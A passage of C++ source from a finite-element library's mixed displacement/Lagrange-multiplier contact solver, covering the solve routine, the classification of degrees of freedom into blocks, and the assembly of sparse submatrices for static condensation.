mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mpSolverDispBlock->Clear();
// We clear the matrixes and vectors
mKDispModified.clear(); /// The modified displacement block
mKLMAModified.clear(); /// The modified active LM block (diagonal)
mKLMIModified.clear(); /// The modified inaactive LM block (diagonal)
mKSAN.clear(); /// The slave active-displacement block
mKSAM.clear(); /// The active slave-master block
mKSASI.clear(); /// The active slave-inactive slave block
mKSASA.clear(); /// The active slave-slave active block
mPOperator.clear(); /// The operator used for the master blocks
mCOperator.clear(); /// The operator used for the active slave block
mResidualLMActive.clear(); /// The residual corresponding the active LM
mResidualLMInactive.clear(); /// The residual corresponding the inactive LM
mResidualDisp.clear(); /// The residual of the displacements
mLMActive.clear(); /// The solution of the active LM
mLMInactive.clear(); /// The solution of the inactive LM
mDisp.clear(); /// The solution of the displacement
mOptions.Set(IS_INITIALIZED, false);
}
/**
* @brief Normal solve method.
* @details Solves the linear system Ax=b and puts the result on SystemVector& rX. rVectorx is also th initial guess for iterative methods.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
bool Solve(
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
// We print the system before condensate (if needed)
if (mEchoLevel == 2) { //if it is needed to print the debug info
KRATOS_INFO("RHS BEFORE CONDENSATION") << "RHS = " << rB << std::endl;
} else if (mEchoLevel == 3) { //if it is needed to print the debug info
KRATOS_INFO("LHS BEFORE CONDENSATION") << "SystemMatrix = " << rA << std::endl;
KRATOS_INFO("RHS BEFORE CONDENSATION") << "RHS = " << rB << std::endl;
} else if (mEchoLevel >= 4) { //print to matrix market file
const std::string matrix_market_name = "before_condensation_A_" + std::to_string(mFileCreated) + ".mm";
TSparseSpaceType::WriteMatrixMarketMatrix(matrix_market_name.c_str(), rA, false);
const std::string matrix_market_vectname = "before_condensation_b_" + std::to_string(mFileCreated) + ".mm.rhs";
TSparseSpaceType::WriteMatrixMarketVector(matrix_market_vectname.c_str(), rB);
}
if (mOptions.IsNot(IS_INITIALIZED))
this->Initialize (rA,rX,rB);
this->InitializeSolutionStep (rA,rX,rB);
this->PerformSolutionStep (rA,rX,rB);
this->FinalizeSolutionStep (rA,rX,rB);
// We print the resulting system (if needed)
if (mEchoLevel == 2) { //if it is needed to print the debug info
KRATOS_INFO("Dx") << "Solution obtained = " << mDisp << std::endl;
KRATOS_INFO("RHS") << "RHS = " << mResidualDisp << std::endl;
} else if (mEchoLevel == 3) { //if it is needed to print the debug info
KRATOS_INFO("LHS") << "SystemMatrix = " << mKDispModified << std::endl;
KRATOS_INFO("Dx") << "Solution obtained = " << mDisp << std::endl;
KRATOS_INFO("RHS") << "RHS = " << mResidualDisp << std::endl;
} else if (mEchoLevel >= 4) { //print to matrix market file
const std::string matrix_market_name = "A_" + std::to_string(mFileCreated) + ".mm";
TSparseSpaceType::WriteMatrixMarketMatrix(matrix_market_name.c_str(), mKDispModified, false);
const std::string matrix_market_vectname = "b_" + std::to_string(mFileCreated) + ".mm.rhs";
TSparseSpaceType::WriteMatrixMarketVector(matrix_market_vectname.c_str(), mResidualDisp);
mFileCreated++;
}
return false;
}
/**
* @brief Multi solve method for solving a set of linear systems with same coefficient matrix.
* @details Solves the linear system Ax=b and puts the result on SystemVector& rX. rVectorx is also th initial guess for iterative methods.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
bool Solve (
SparseMatrixType& rA,
DenseMatrixType& rX,
DenseMatrixType& rB
) override
{
return false;
}
/**
* @brief Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* @details Another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function tells if the solver requires such data
*/
bool AdditionalPhysicalDataIsNeeded() override
{
return true;
}
/**
* @brief Some solvers may require a minimum degree of knowledge of the structure of the matrix.
* @details To make an example when solving a mixed u-p problem, it is important to identify the row associated to v and p. Another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers which require knowledge on the spatial position of the nodes associated to a given dof. This function is the place to eventually provide such data
* @param rA System matrix
* @param rX Solution vector. It's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void ProvideAdditionalData (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB,
DofsArrayType& rDofSet,
ModelPart& rModelPart
) override
{
// Allocating auxiliar parameters
IndexType node_id;
// Count LM dofs
SizeType n_lm_inactive_dofs = 0, n_lm_active_dofs = 0;
SizeType n_master_dofs = 0;
SizeType n_slave_inactive_dofs = 0, n_slave_active_dofs = 0;
SizeType tot_active_dofs = 0;
// We separate if we consider a block builder and solver or an elimination builder and solver
if (rModelPart.IsNot(TO_SPLIT)) {
// In case of block builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& node = rModelPart.GetNode(node_id);
if (i_dof.EquationId() < rA.size1()) {
tot_active_dofs++;
if (IsLMDof(i_dof)) {
if (node.Is(ACTIVE))
n_lm_active_dofs++;
else
n_lm_inactive_dofs++;
} else if (node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (node.Is(MASTER)) {
n_master_dofs++;
} else if (node.Is(SLAVE)) {
if (node.Is(ACTIVE))
n_slave_active_dofs++;
else
n_slave_inactive_dofs++;
}
}
}
}
} else {
// In case of elimination builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& node = rModelPart.GetNode(node_id);
tot_active_dofs++;
if (IsLMDof(i_dof)) {
if (node.Is(ACTIVE))
n_lm_active_dofs++;
else
n_lm_inactive_dofs++;
} else if (node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (node.Is(MASTER)) {
n_master_dofs++;
} else if (node.Is(SLAVE)) {
if (node.Is(ACTIVE))
n_slave_active_dofs++;
else
n_slave_inactive_dofs++;
}
}
}
}
KRATOS_ERROR_IF(tot_active_dofs != rA.size1()) << "Total system size does not coincide with the free dof map: " << tot_active_dofs << " vs " << rA.size1() << std::endl;
// Resize arrays as needed
if (mMasterIndices.size() != n_master_dofs)
mMasterIndices.resize (n_master_dofs,false);
if (mSlaveInactiveIndices.size() != n_slave_inactive_dofs)
mSlaveInactiveIndices.resize (n_slave_inactive_dofs,false);
if (mSlaveActiveIndices.size() != n_slave_active_dofs)
mSlaveActiveIndices.resize (n_slave_active_dofs,false);
if (mLMInactiveIndices.size() != n_lm_inactive_dofs)
mLMInactiveIndices.resize (n_lm_inactive_dofs,false);
if (mLMActiveIndices.size() != n_lm_active_dofs)
mLMActiveIndices.resize (n_lm_active_dofs,false);
const SizeType n_other_dofs = tot_active_dofs - n_lm_inactive_dofs - n_lm_active_dofs - n_master_dofs - n_slave_inactive_dofs - n_slave_active_dofs;
if (mOtherIndices.size() != n_other_dofs)
mOtherIndices.resize (n_other_dofs, false);
if (mGlobalToLocalIndexing.size() != tot_active_dofs)
mGlobalToLocalIndexing.resize (tot_active_dofs,false);
if (mWhichBlockType.size() != tot_active_dofs)
mWhichBlockType.resize(tot_active_dofs, false);
// Size check
KRATOS_ERROR_IF_NOT(n_lm_active_dofs == n_slave_active_dofs) << "The number of active LM dofs: " << n_lm_active_dofs << " and active slave nodes dofs: " << n_slave_active_dofs << " does not coincide" << std::endl;
/**
* Construct aux_lists as needed
* "other_counter[i]" i will contain the position in the global system of the i-th NON-LM node
* "lm_active_counter[i]" will contain the in the global system of the i-th NON-LM node
* mGlobalToLocalIndexing[i] will contain the position in the local blocks of the
*/
SizeType lm_inactive_counter = 0, lm_active_counter = 0;
SizeType master_counter = 0;
SizeType slave_inactive_counter = 0, slave_active_counter = 0;
SizeType other_counter = 0;
IndexType global_pos = 0;
// We separate if we consider a block builder and solver or an elimination builder and solver
if (rModelPart.IsNot(TO_SPLIT)) {
// In case of block builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& r_node = rModelPart.GetNode(node_id);
if (i_dof.EquationId() < rA.size1()) {
if (IsLMDof(i_dof)) {
if (r_node.Is(ACTIVE)) {
mLMActiveIndices[lm_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_active_counter;
mWhichBlockType[global_pos] = BlockType::LM_ACTIVE;
++lm_active_counter;
} else {
mLMInactiveIndices[lm_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_inactive_counter;
mWhichBlockType[global_pos] = BlockType::LM_INACTIVE;
++lm_inactive_counter;
}
} else if ( r_node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (r_node.Is(MASTER)) {
mMasterIndices[master_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = master_counter;
mWhichBlockType[global_pos] = BlockType::MASTER;
++master_counter;
} else if (r_node.Is(SLAVE)) {
if (r_node.Is(ACTIVE)) {
mSlaveActiveIndices[slave_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_active_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_ACTIVE;
++slave_active_counter;
} else {
mSlaveInactiveIndices[slave_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_inactive_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_INACTIVE;
++slave_inactive_counter;
}
} else { // We need to consider always an else to ensure that the system size is consistent
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
} else {
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
++global_pos;
}
}
} else {
// In case of elimination builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& r_node = rModelPart.GetNode(node_id);
if (IsLMDof(i_dof)) {
if (r_node.Is(ACTIVE)) {
mLMActiveIndices[lm_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_active_counter;
mWhichBlockType[global_pos] = BlockType::LM_ACTIVE;
++lm_active_counter;
} else {
mLMInactiveIndices[lm_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_inactive_counter;
mWhichBlockType[global_pos] = BlockType::LM_INACTIVE;
++lm_inactive_counter;
}
} else if ( r_node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (r_node.Is(MASTER)) {
mMasterIndices[master_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = master_counter;
mWhichBlockType[global_pos] = BlockType::MASTER;
++master_counter;
} else if (r_node.Is(SLAVE)) {
if (r_node.Is(ACTIVE)) {
mSlaveActiveIndices[slave_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_active_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_ACTIVE;
++slave_active_counter;
} else {
mSlaveInactiveIndices[slave_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_inactive_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_INACTIVE;
++slave_inactive_counter;
}
} else { // We need to consider always an else to ensure that the system size is consistent
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
} else {
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
++global_pos;
}
}
KRATOS_DEBUG_ERROR_IF(master_counter != n_master_dofs) << "The number of active slave dofs counter : " << master_counter << "is higher than the expected: " << n_master_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(slave_active_counter != n_slave_active_dofs) << "The number of active slave dofs counter : " << slave_active_counter << "is higher than the expected: " << n_slave_active_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(slave_inactive_counter != n_slave_inactive_dofs) << "The number of inactive slave dofs counter : " << slave_inactive_counter << "is higher than the expected: " << n_slave_inactive_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(lm_active_counter != n_lm_active_dofs) << "The number of active LM dofs counter : " << lm_active_counter << "is higher than the expected: " << n_lm_active_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(lm_inactive_counter != n_lm_inactive_dofs) << "The number of inactive LM dofs counter : " << lm_inactive_counter << "is higher than the expected: " << n_lm_inactive_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(other_counter != n_other_dofs) << "The number of other dofs counter : " << other_counter << "is higher than the expected: " << n_other_dofs << std::endl;
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "Mixed displacement LM linear solver";
}
/// Print information about this object.
void PrintInfo (std::ostream& rOStream) const override
{
rOStream << "Mixed displacement LM linear solver";
}
/// Print object's data.
void PrintData (std::ostream& rOStream) const override
{
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
///@name Protected Operations
///@{
/**
* @brief T his function generates the subblocks of matrix A
* @details as A = ( KNN KNM KNSI KNSA 0 0 ) u
* ( KMN KMM KMSI KMSA -MI^T -MA^T ) u_master
* ( KSIN KSIM KSISI KSISA DII^T DIA^T ) u_slave_inactive
* ( KSAN KSAM KSASI KSASA DAI^T DAA^T ) u_slave_active
* ( 0 0 0 0 ALMI 0 ) LMInactive
* ( 0 KLMAM KLMASI KLMASA 0 KLMALMA ) LMActive
* We will call as A = ( KNN KNM KNSI KNSA 0 0 ) u
* ( KMN KMM KMSI KMSA KMLMI KMLMA ) u_master
* ( KSIN KSIM KSISI KSISA KSILMI KSILMA ) u_slave_inactive
* ( KSAN KSAM KSASI KSASA KSALMI KSALMA ) u_slave_active
* ( 0 0 0 0 KLMILMI 0 ) LMInactive
* ( 0 KLMAM KLMASI KLMASA 0 KLMALMA ) LMActive
* Subblocks are allocated or nor depending on the value of "NeedAllocation"
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void FillBlockMatrices (
const bool NeedAllocation,
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
)
{
KRATOS_TRY
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
if (NeedAllocation)
AllocateBlocks();
// Get access to A data
const IndexType* index1 = rA.index1_data().begin();
const IndexType* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
// Allocate the auxiliar blocks by push_back
SparseMatrixType KMLMA(master_size, lm_active_size); /// The master-active LM block (this is the big block of M)
SparseMatrixType KLMALMA(lm_active_size, lm_active_size); /// The active LM-active LM block
SparseMatrixType KSALMA(slave_active_size, lm_active_size); /// The active slave-active LM block (this is the big block of D, diagonal)
SparseMatrixType KLMILMI(lm_inactive_size, lm_inactive_size); /// The inactive LM- inactive LM block (diagonal)
IndexType* KMLMA_ptr = new IndexType[master_size + 1];
IndexType* mKSAN_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSAM_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSASI_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSASA_ptr = new IndexType[slave_active_size + 1];
IndexType* KSALMA_ptr = new IndexType[slave_active_size + 1];
IndexType* KLMILMI_ptr = new IndexType[lm_inactive_size + 1];
IndexType* KLMALMA_ptr = new IndexType[lm_active_size + 1];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(master_size + 1); i++)
KMLMA_ptr[i] = 0;
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(slave_active_size + 1); i++) {
mKSAN_ptr[i] = 0;
mKSAM_ptr[i] = 0;
mKSASI_ptr[i] = 0;
mKSASA_ptr[i] = 0;
KSALMA_ptr[i] = 0;
}
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(lm_inactive_size + 1); i++)
KLMILMI_ptr[i] = 0;
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(lm_active_size + 1); i++)
KLMALMA_ptr[i] = 0;
#pragma omp parallel
{
// We iterate over original matrix
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
const IndexType row_begin = index1[i];
const IndexType row_end = index1[i+1];
const IndexType local_row_id = mGlobalToLocalIndexing[i];
IndexType KMLMA_cols = 0;
IndexType mKSAN_cols = 0;
IndexType mKSAM_cols = 0;
IndexType mKSASI_cols = 0;
IndexType mKSASA_cols = 0;
IndexType KSALMA_cols = 0;
IndexType KLMILMI_cols = 0;
IndexType KLMALMA_cols = 0;
if ( mWhichBlockType[i] == BlockType::MASTER) { // KMLMA
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KMLMA block
++KMLMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > master_size) << "MASTER:: Local row ID: " << local_row_id <<" is greater than the number of rows " << master_size << std::endl;
KMLMA_ptr[local_row_id + 1] = KMLMA_cols;
} else if ( mWhichBlockType[i] == BlockType::SLAVE_ACTIVE) { //either KSAN or KSAM or KSASA or KSASA or KSALM
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) { // KSAN block
++mKSAN_cols;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) { // KSAM block
++mKSAM_cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) { // KSASI block
++mKSASI_cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) { // KSASA block
++mKSASA_cols;
} else if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KSALMA block (diagonal)
++KSALMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > slave_active_size) << "SLAVE_ACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << slave_active_size << std::endl;
mKSAN_ptr[local_row_id + 1] = mKSAN_cols;
mKSAM_ptr[local_row_id + 1] = mKSAM_cols;
mKSASI_ptr[local_row_id + 1] = mKSASI_cols;
mKSASA_ptr[local_row_id + 1] = mKSASA_cols;
KSALMA_ptr[local_row_id + 1] = KSALMA_cols;
} else if ( mWhichBlockType[i] == BlockType::LM_INACTIVE) { // KLMILMI
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_INACTIVE) { // KLMILMI block (diagonal)
++KLMILMI_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > lm_inactive_size) << "LM_INACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << lm_inactive_size << std::endl;
KLMILMI_ptr[local_row_id + 1] = KLMILMI_cols;
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { // KLMALMA
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KLMALMA block
++KLMALMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > lm_active_size) << "LM_ACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << lm_active_size << std::endl;
KLMALMA_ptr[local_row_id + 1] = KLMALMA_cols;
}
}
}
// We initialize the blocks sparse matrix
std::partial_sum(KMLMA_ptr, KMLMA_ptr + master_size + 1, KMLMA_ptr);
const std::size_t KMLMA_nonzero_values = KMLMA_ptr[master_size];
IndexType* aux_index2_KMLMA= new IndexType[KMLMA_nonzero_values];
double* aux_val_KMLMA= new double[KMLMA_nonzero_values];
std::partial_sum(mKSAN_ptr, mKSAN_ptr + slave_active_size + 1, mKSAN_ptr);
const std::size_t mKSAN_nonzero_values = mKSAN_ptr[slave_active_size];
IndexType* aux_index2_mKSAN= new IndexType[mKSAN_nonzero_values];
double* aux_val_mKSAN= new double[mKSAN_nonzero_values];
std::partial_sum(mKSAM_ptr, mKSAM_ptr + slave_active_size + 1, mKSAM_ptr);
const std::size_t mKSAM_nonzero_values = mKSAM_ptr[slave_active_size];
IndexType* aux_index2_mKSAM= new IndexType[mKSAM_nonzero_values];
double* aux_val_mKSAM= new double[mKSAM_nonzero_values];
std::partial_sum(mKSASI_ptr, mKSASI_ptr + slave_active_size + 1, mKSASI_ptr);
const std::size_t mKSASI_nonzero_values = mKSASI_ptr[slave_active_size];
IndexType* aux_index2_mKSASI= new IndexType[mKSASI_nonzero_values];
double* aux_val_mKSASI= new double[mKSASI_nonzero_values];
std::partial_sum(mKSASA_ptr, mKSASA_ptr + slave_active_size + 1, mKSASA_ptr);
const std::size_t mKSASA_nonzero_values = mKSASA_ptr[slave_active_size];
IndexType* aux_index2_mKSASA= new IndexType[mKSASA_nonzero_values];
double* aux_val_mKSASA = new double[mKSASA_nonzero_values];
std::partial_sum(KSALMA_ptr, KSALMA_ptr + slave_active_size + 1, KSALMA_ptr);
const std::size_t KSALMA_nonzero_values = KSALMA_ptr[slave_active_size];
IndexType* aux_index2_KSALMA= new IndexType[KSALMA_nonzero_values];
double* aux_val_KSALMA = new double[KSALMA_nonzero_values];
std::partial_sum(KLMILMI_ptr, KLMILMI_ptr + lm_inactive_size + 1, KLMILMI_ptr);
const std::size_t KLMILMI_nonzero_values = KLMILMI_ptr[lm_inactive_size];
IndexType* aux_index2_KLMILMI= new IndexType[KLMILMI_nonzero_values];
double* aux_val_KLMILMI = new double[KLMILMI_nonzero_values];
std::partial_sum(KLMALMA_ptr, KLMALMA_ptr + lm_active_size + 1, KLMALMA_ptr);
const std::size_t KLMALMA_nonzero_values = KLMALMA_ptr[lm_active_size];
IndexType* aux_index2_KLMALMA = new IndexType[KLMALMA_nonzero_values];
double* aux_val_KLMALMA = new double[KLMALMA_nonzero_values];
#pragma omp parallel
{
// We iterate over original matrix
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
const IndexType row_begin = index1[i];
const IndexType row_end = index1[i+1];
const IndexType local_row_id = mGlobalToLocalIndexing[i];
if ( mWhichBlockType[i] == BlockType::MASTER) { // KMLMA
IndexType KMLMA_row_beg = KMLMA_ptr[local_row_id];
IndexType KMLMA_row_end = KMLMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KMLMA block
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KMLMA[KMLMA_row_end] = local_col_id;
aux_val_KMLMA[KMLMA_row_end] = value;
++KMLMA_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::SLAVE_ACTIVE) { //either KSAN or KSAM or KSASA or KSASA or KSALM
IndexType mKSAN_row_beg = mKSAN_ptr[local_row_id];
IndexType mKSAN_row_end = mKSAN_row_beg;
IndexType mKSAM_row_beg = mKSAM_ptr[local_row_id];
IndexType mKSAM_row_end = mKSAM_row_beg;
IndexType mKSASI_row_beg = mKSASI_ptr[local_row_id];
IndexType mKSASI_row_end = mKSASI_row_beg;
IndexType mKSASA_row_beg = mKSASA_ptr[local_row_id];
IndexType mKSASA_row_end = mKSASA_row_beg;
IndexType KSALMA_row_beg = KSALMA_ptr[local_row_id];
IndexType KSALMA_row_end = KSALMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
if (mWhichBlockType[col_index] == BlockType::OTHER) { // KSAN block
aux_index2_mKSAN[mKSAN_row_end] = local_col_id;
aux_val_mKSAN[mKSAN_row_end] = value;
++mKSAN_row_end;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) { // KSAM block
aux_index2_mKSAM[mKSAM_row_end] = local_col_id;
aux_val_mKSAM[mKSAM_row_end] = value;
++mKSAM_row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) { // KSASI block
aux_index2_mKSASI[mKSASI_row_end] = local_col_id;
aux_val_mKSASI[mKSASI_row_end] = value;
++mKSASI_row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) { // KSASA block
aux_index2_mKSASA[mKSASA_row_end] = local_col_id;
aux_val_mKSASA[mKSASA_row_end] = value;
++mKSASA_row_end;
} else if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KSALMA block (diagonal)
aux_index2_KSALMA[KSALMA_row_end] = local_col_id;
aux_val_KSALMA[KSALMA_row_end] = value;
++KSALMA_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::LM_INACTIVE) { // KLMILMI
IndexType KLMILMI_row_beg = KLMILMI_ptr[local_row_id];
IndexType KLMILMI_row_end = KLMILMI_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_INACTIVE) { // KLMILMI block (diagonal)
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KLMILMI[KLMILMI_row_end] = local_col_id;
aux_val_KLMILMI[KLMILMI_row_end] = value;
++KLMILMI_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { // KLMALMA
IndexType KLMALMA_row_beg = KLMALMA_ptr[local_row_id];
IndexType KLMALMA_row_end = KLMALMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KLMALMA block
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KLMALMA[KLMALMA_row_end] = local_col_id;
aux_val_KLMALMA[KLMALMA_row_end] = value;
++KLMALMA_row_end;
}
}
}
}
}
CreateMatrix(KMLMA, master_size, lm_active_size, KMLMA_ptr, aux_index2_KMLMA, aux_val_KMLMA);
CreateMatrix(mKSAN, slave_active_size, other_dof_size, mKSAN_ptr, aux_index2_mKSAN, aux_val_mKSAN);
CreateMatrix(mKSAM, slave_active_size, master_size, mKSAM_ptr, aux_index2_mKSAM, aux_val_mKSAM);
CreateMatrix(mKSASI, slave_active_size, slave_inactive_size, mKSASI_ptr, aux_index2_mKSASI, aux_val_mKSASI);
CreateMatrix(mKSASA, slave_active_size, slave_active_size, mKSASA_ptr, aux_index2_mKSASA, aux_val_mKSASA);
CreateMatrix(KSALMA, slave_active_size, lm_active_size, KSALMA_ptr, aux_index2_KSALMA, aux_val_KSALMA);
CreateMatrix(KLMILMI, lm_inactive_size, lm_inactive_size, KLMILMI_ptr, aux_index2_KLMILMI, aux_val_KLMILMI);
CreateMatrix(KLMALMA, lm_active_size, lm_active_size, KLMALMA_ptr, aux_index2_KLMALMA, aux_val_KLMALMA);
// We compute directly the inverse of the KSALMA matrix
// KSALMA it is supposed to be a diagonal matrix (in fact it is the key point of this formulation)
// (NOTE: technically it is not a stiffness matrix, we give that name)
if (lm_active_size > 0) {
ComputeDiagonalByLumping(KSALMA, mKLMAModified, ZeroTolerance);
}
// We compute directly the inverse of the KLMILMI matrix
// KLMILMI it is supposed to be a diagonal matrix (in fact it is the key point of this formulation)
// (NOTE: technically it is not a stiffness matrix, we give that name)
if (lm_inactive_size > 0) {
ComputeDiagonalByLumping(KLMILMI, mKLMIModified, ZeroTolerance);
}
// Compute the P and C operators
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(KMLMA, mKLMAModified, mPOperator);
SparseMatrixMultiplicationUtility::MatrixMultiplication(KLMALMA, mKLMAModified, mCOperator);
}
// We proceed with the auxiliar products for the master blocks
SparseMatrixType master_auxKSAN(master_size, other_dof_size);
SparseMatrixType master_auxKSAM(master_size, master_size);
SparseMatrixType master_auxKSASI(master_size, slave_inactive_size);
SparseMatrixType master_auxKSASA(master_size, slave_active_size);
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSAN, master_auxKSAN);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSAM, master_auxKSAM);
if (slave_inactive_size > 0)
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSASI, master_auxKSASI);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSASA, master_auxKSASA);
}
// We proceed with the auxiliar products for the active slave blocks
SparseMatrixType aslave_auxKSAN(slave_active_size, other_dof_size);
SparseMatrixType aslave_auxKSAM(slave_active_size, master_size);
SparseMatrixType aslave_auxKSASI(slave_active_size, slave_inactive_size);
SparseMatrixType aslave_auxKSASA(slave_active_size, slave_active_size);
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSAN, aslave_auxKSAN);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSAM, aslave_auxKSAM);
if (slave_inactive_size > 0)
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSASI, aslave_auxKSASI);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSASA, aslave_auxKSASA);
}
// Auxiliar indexes
const SizeType other_dof_initial_index = 0;
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
// The auxiliar index structure
const SizeType nrows = mKDispModified.size1();
const SizeType ncols = mKDispModified.size2();
IndexType* K_disp_modified_ptr_aux1 = new IndexType[nrows + 1];
